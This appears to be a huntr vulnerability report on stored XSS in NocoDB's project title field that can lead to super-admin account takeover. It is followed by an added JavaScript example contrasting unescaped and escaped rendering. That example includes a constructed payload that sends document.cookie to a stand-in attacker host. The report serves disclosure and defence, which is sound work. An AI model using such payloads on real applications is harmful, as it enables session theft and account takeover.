huntr / rajbabai8 / F6082949-40D3-411C-B613-23ADA2691913
History: Jun 03, 2022 - 6:32 p.m.

Account takeover due to stored XSS in "Project Title"

2022-06-03 18:32:19
rajbabai8
www.huntr.dev
19

EPSS: 0.001 (Low), percentile 21.6%

Description

The project "Title" field of the NocoDB application is vulnerable to stored XSS. Because the stored title is later rendered in a privileged user's browser, the payload runs in the super admin's session and can lead to admin account takeover.

Proof of Concept

1. Log in as a low-privileged user, click "New Project", then click "Create".

2. Enter the payload <img src> as the project title and click "Create" again, so the payload is stored as the title.

3. Log in as the super admin and "delete" the project titled <img src>. The stored title is rendered unescaped and the payload executes in the super admin's browser.

PoC video:

https://drive.google.com/file/d/1tVJFpajTWGOrgYvLj2eHfqcrLcWCSKnG/view?usp=sharing
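The following is an added example, not NocoDB's code and not the reporter's PoC. It models the mechanism behind the steps above: a stored project title interpolated into markup without escaping runs in the browser of whoever views it (here the super admin opening the delete dialog), while the same title rendered through an HTML escaper is inert. The payload string, the dialog markup, the attacker host and the function names are all constructed for illustration; the report itself shows only a truncated "<img src>".

```javascript
// Added example (not NocoDB's code). Constructed stored-XSS payload standing in
// for whatever the reporter used; the host attacker.example is fictional.
const CONSTRUCTED_PAYLOAD =
  '<img src=x onerror="fetch(\'https://attacker.example/c?\'+document.cookie)">';

// Minimal HTML escaper for text placed into element content or quoted attributes.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern: the stored title is dropped straight into markup, which is
// what element.innerHTML = ... or a v-html binding does with it.
function renderDeleteDialogUnsafe(projectTitle) {
  return `<p>Delete project "${projectTitle}"?</p>`;
}

// Hardened pattern: the title is escaped before interpolation, equivalent to
// setting textContent or using Vue's default {{ }} interpolation. The browser
// then parses the payload as text and never creates an <img> element.
function renderDeleteDialogSafe(projectTitle) {
  return `<p>Delete project "${escapeHtml(projectTitle)}"?</p>`;
}

// Test helper: does the rendered dialog contain any element other than the
// fixed <p> wrapper? An "onerror=" that survives only as escaped text is
// harmless, so we look for an actual tag, not for the handler name.
function hasInjectedMarkup(html) {
  const inner = html.slice('<p>'.length, -'</p>'.length);
  return /<[a-z][^>]*>/i.test(inner);
}

// Stand-alone demonstration: prints both renderings for a quick look.
console.log('unsafe:', renderDeleteDialogUnsafe(CONSTRUCTED_PAYLOAD));
console.log('safe:  ', renderDeleteDialogSafe(CONSTRUCTED_PAYLOAD));
```

The takeover follows from context, not from the payload itself: the script runs with the super admin's cookies and origin, so any request the admin's browser can make to the application, the injected script can make too. The fix belongs at render time (escape or use text interpolation for every place a project title is displayed), with storage-side filtering only as defence in depth.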

